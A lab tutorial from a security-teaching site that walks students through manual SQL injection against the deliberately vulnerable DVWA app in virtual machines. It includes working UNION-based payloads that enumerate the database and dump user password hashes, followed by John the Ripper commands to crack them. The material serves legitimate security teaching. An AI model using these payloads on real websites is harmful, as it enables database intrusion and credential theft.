ComputerSecurityStudent (CSS) [Login] [Join Now]

HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED

CONTACT US

|SECURITY TOOLS >> Damn Vulnerable Web App >> DVWA v1.0.7 >> Current Page |Views:
114383

(Damn Vulnerable Web App (DVWA): Lesson 6)

{ Manual SQL Injection, John the Ripper } Help
ComputerSecurityStudent
pay for continued
research,
resources & bandwidth
Section 0. Background Information
What is Damn Vulnerable Web App (DVWA)?
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application
that is damn vulnerable.
Its main goals are to be an aid for security professionals to
test their skills and tools in a legal environment, help web
developers better understand the processes of securing web
applications and aid teachers/students to teach/learn web
application security in a class room environment.

What is a SQL Injection?

SQL injection (also known as SQL fishing) is a technique often
used to attack data driven applications.
This is done by including portions of SQL statements in an entry
field in an attempt to get the website to pass a newly formed
rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection
technique that exploits a security vulnerability in an
application's software.
The vulnerability happens when user input is either incorrectly
filtered for string literal escape characters embedded in SQL
statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for
websites but can be used to attack any type of SQL database.

What is SQL Injection Harvesting?

SQL Injection Harvesting is where a malicious user supplies SQL
statements to render sensitive data such as usernames, passwords,
database tables, and more.

Pre-Requisite Lab
Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14

Lab Notes
In this lab we will do the following:
1. We use inject always true SQL statements into the SQL
Injection User ID field with security set to low.
2. We will obtain the username and raw-MD5 password contents
from the users table.
3. We will use John the Ripper to crack the raw-MD5 password
HASH for each user.
 Legal Disclaimer
As a condition of your use of this Web site, you warrant to
computersecuritystudent.com that you will not use this Web site
for any purpose that is unlawful or that is prohibited by these
terms, conditions, and notices.
In accordance with UCC § 2-316, this product is provided with "no
warranties, either expressed or implied." The information
contained is provided "as-is", with "no guarantee of
merchantability."
In addition, this is a teaching website that does not condone
malicious behavior of any kind.
Your are on notice, that continuing and/or using this lab outside
your "own" test environment is considered malicious and is
against the law.
© 2012 No content replication of any kind is allowed without
express written permission.

Section 1: Configure Fedora14 Virtual Machine Settings

1. Open Your VMware Player
Instructions:
1. On Your Host Computer, Go To
2. Start --> All Program --> VMWare --> VMWare Player

2. Edit fedora14 Virtual Machine Settings

Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings
 3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click on the OK Button.

Section 2: Login to Fedora14

1. Start Fedora14 VM Instance
Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine
2. Login to Fedora14
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Section 3: Open Console Terminal and Retrieve IP Address
1. Start a Terminal Console
Instructions:
1. Applications --> Terminal
2. Switch user to root
Instructions:
1. su - root
2. <Whatever you set the root password to>
 3. Get IP Address
Instructions:
1. ifconfig -a
Notes(FYI):
As indicated below, my IP address is 192.168.1.106.
Please record your IP address.

Section 4: Configure BackTrack Virtual Machine Settings

1. Open Your VMware Player
Instructions:
1. On Your Host Computer, Go To
2. Start --> All Program --> VMWare --> VMWare Player

2. Edit BackTrack Virtual Machine Settings

Instructions:
1. Highlight BackTrack5R1
2. Click Edit virtual machine settings
3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Do not Click on the OK Button.
Section 5: Login to BackTrack
1. Start BackTrack VM Instance
Instructions:
1. Start Up VMWare Player
2. Select BackTrack5R1
3. Play virtual machine
2. Login to BackTrack
Instructions:
1. Login: root
2. Password: toor or <whatever you changed it to>.
 3. Bring up the GNOME
Instructions:
1. Type startx

Section 6: Open Console Terminal and Retrieve IP Address

1. Open a console terminal
Instructions:
1. Click on the console terminal

2. Get IP Address
Instructions:
1. ifconfig -a
Notes(FYI):
As indicated below, my IP address is 192.168.1.105.
Please record your IP address.
Section 7: Login to DVWA
1. Start Firefox
Instructions:
1. Click on Firefox
2. Login to DVWA
Instructions:
1. Start up Firefox on BackTrack
2. Place http://192.168.1.106/dvwa/login.php in the address bar.
Replace 192.168.1.106 with Fedora's IP address obtained
in (Section 3, Step 3).
3. Login: admin
4. Password: password
5. Click on Login
Section 8: Set Security Level
1. Set DVWA Security Level
Instructions:
1. Click on DVWA Security, in the left hand menu.
2. Select "low"
3. Click Submit
Section 9: Manual SQL Injection
1. SQL Injection Menu
Instructions:
1. Select "SQL Injection" from the left navigation menu.
2. Basic Injection
Instructions:
1. Input "1" into the text box.
2. Click Submit.
3. Note, webpage/code is supposed to print ID, First name, and
Surname to the screen.
Notes(FYI):
Below is the PHP select statement that we will be exploiting,
specifically $id.
$getid = "SELECT first_name, last_name FROM users WHERE user_id =
'$id'";

3. Always True Scenario

Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or '0'='0
2. Click Submit
Notes(FYI):
In this scenario, we are saying display all record that are
false and all records that are true.
%' - Will probably not be equal to anything, and will be
false.
'0'='0' - Is equal to true, because 0 will always equal
0.
Database Statement
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or
'0'='0';
4. Display Database Version
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, version() #
2. Click Submit
Notes(FYI):
Notice in the last displayed line, 5.1.60 is displayed in the
surname.
This is the version of the mysql database.
5. Display Database User
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, user() #
Notes(FYI):
Notice in the last displayed line, root@localhost is
displayed in the surname.
This is the name of the database user that executed the
behind the scenes PHP code.
6. Display Database Name
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, database() #
Notes(FYI):
Notice in the last displayed line, dvwa is displayed in the
surname.
This is the name of the database.
7. Display all tables in information_schema
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from
information_schema.tables #
2. Click Submit
Notes(FYI):
Now we are displaying all the tables in the
information_schema database.
The INFORMATION_SCHEMA is the information database, the place
that stores information about all the other databases that
the MySQL server maintains.
8. Display all the user tables in information_schema
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
2. Click Submit
Notes(FYI):
Now we are displaying all the tables that start with the
prefix "user" in the information_schema database.
9. Display all the columns fields in the information_schema user table
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
2. Click Submit
Notes(FYI):
Now we are displaying all the columns in the users table.
Notice there are a user_id, first_name, last_name, user and
Password column.

10. Display all the columns field contents in the information_schema user
table
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
2. Click Submit
Notes(FYI):
Now we have successfully displayed all the necessary
authentication information into this database.
Section 10: Create Password Hash File
1. Create Password Hash File
Instructions:
1. Highlight both admin and the password hash
2. Right Click
3. Copy
2. Open Notepad
Instructions:
1. Applications --> Wine --> Programs --> Accessories -->
Notepad
3. Paste in Notepad
Instructions:
1. Edit --> Paste

4. Format in Notepad
Instructions:
1. Place a ":" immediately after admin
2. Make sure your cursor is immediately after the ":" and hit
the delete button.
3. Now you should see the user admin and the password hash
separated by a ":" on the same line.
4. Cut the username and password combinations for gordonb, 1337,
pablo, and smitty from (Section 11, Step 1) and paste in this
file as well.
5. Save in Notepad
Instructions:
1. Navigate to --> /pentest/passwords/john
2. Name the file name --> dvwa_password.txt
3. Click Save
Section 11: Proof of Lab Using John the Ripper
1. Proof of Lab
Instructions:
1. Bring up a new terminal, see (Section 7, Step 1)
2. cd /pentest/passwords/john
3. ./john --format=raw-MD5 dvwa_password.txt
4. date
5. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle